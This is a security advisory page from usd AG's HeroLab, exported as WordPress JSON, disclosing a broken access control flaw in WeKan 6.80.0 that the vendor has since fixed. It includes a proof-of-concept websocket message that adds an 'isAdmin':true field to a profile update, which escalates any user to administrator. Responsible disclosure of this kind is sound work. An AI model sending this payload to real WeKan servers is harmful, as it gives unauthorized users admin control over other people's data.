{"id":22665,"date":"2024-05-31T08:41:26","date_gmt":"2024-05-31T06:41:26","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=22665"},"modified":"2024-05-31T12:14:50","modified_gmt":"2024-05-31T10:14:50","slug":"usd-2023-0008","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0008\/","title":{"rendered":"usd-2023-0008"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.25.1\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n<h1>usd-2023-0008 | WeKan 6.80.0 - Broken Access Control<\/h1>\n<h1><\/h1>\n<p><strong>Advisory ID<\/strong>: usd-2023-0008<br \/>\n<strong>Product<\/strong>: WeKan<br \/>\n<strong>Affected Version<\/strong>: 6.80.0<br \/>\n<strong>Vulnerability Type<\/strong>: Broken Access Control (CWE-284)<br \/>\n<strong>Security Risk<\/strong>: High (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H)<br \/>\n<strong>Vendor URL<\/strong>: <a href=\"https:\/\/github.com\/wekan\/wekan\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/wekan\/wekan<\/a><br \/>\n<strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/>\n<strong>Vendor Status<\/strong>: Fixed<br \/>\n<strong>Advisory Status<\/strong>: Published<br \/>\n<strong>CVE number<\/strong>: Not requested yet<br \/>\n<strong>CVE Link<\/strong>: Not requested yet<\/p>\n<h3>Description<\/h3>\n<p>WeKan is an open source Kanban application. A vulnerability in <em>WeKan<\/em> allows any user to escalate their privileges to admin user.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>The application communicates using websockets.<br \/>\nThe original websocket message on a profile update action is the following:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span>[\"{\\\"msg\\\":\\\"method\\\",\\\"id\\\":\\\"13\\\",\\\"method\\\":\\\"\/users\/update\\\",\\\"params\\\":[{\\\"_id\\\":\\\"NuDSTaQ4gvpcgMpzg\\\"},{\\\"$set\\\":{\\\"profile.fullname\\\":\\\"test\\\",\\\"modifiedAt\\\":{\\\"$date\\\":1679676730422}},\\\"$unset\\\":{\\\"profile.initials\\\":\\\"\\\"}},{}]}\"]<\/pre>\n<\/div>\n<p>The request sets the users fullname to a simple \"test\".<\/p>\n<p>The user can add a custom parameter <strong>isAdmin<\/strong> to the request, which escalates the users permissions to admin permission:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span>[\"{\\\"msg\\\":\\\"method\\\",\\\"id\\\":\\\"13\\\",\\\"method\\\":\\\"\/users\/update\\\",\\\"params\\\":[{\\\"_id\\\":\\\"NuDSTaQ4gvpcgMpzg\\\"},{\\\"$set\\\":{\\\"profile.fullname\\\":\\\"s\\\",\\\"isAdmin\\\":true,\\\"modifiedAt\\\":{\\\"$date\\\":1679676730422}},\\\"$unset\\\":{\\\"profile.initials\\\":\\\"\\\"}},{}]}\"]<\/pre>\n<\/div>\n<p>The admin panel is now accessible for the user.<\/p>\n<h3>Fix<\/h3>\n<p>It is recommended to perform proper access control and permission checks.<\/p>\n<h3>References<\/h3>\n<ul>\n<li><a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/284.html\" target=\"_blank\" rel=\"noopener\">https:\/\/cwe.mitre.org\/data\/definitions\/284.html<\/a><\/li>\n<\/ul>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2023-04-25:<\/strong> Details were submitted using PGP according to the security policy.<\/li>\n<li><strong>2023-04-26:<\/strong> The issue is reported to be fixed by the vendor.<\/li>\n<li><strong>2023-04-26:<\/strong> The fix is tested and verified to actually address the vulnerability sufficiently.<\/li>\n<li><strong>2024-05-27:<\/strong> This advisory is published.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Christian P\u00f6schl of usd AG.[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2023-0008 | WeKan 6.80.0 - Broken Access Control Advisory ID: usd-2023-0008 Product: WeKan Affected Version: 6.80.0 Vulnerability Type: Broken Access Control (CWE-284) Security Risk: High (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H) Vendor URL: https:\/\/github.com\/wekan\/wekan Vendor acknowledged vulnerability: Yes Vendor Status: Fixed Advisory Status: Published CVE number: Not requested yet CVE Link: Not requested yet Description WeKan is an open source [&hellip;]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-22665","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22665","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=22665"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22665\/revisions"}],"predecessor-version":[{"id":22715,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22665\/revisions\/22715"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=22665"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}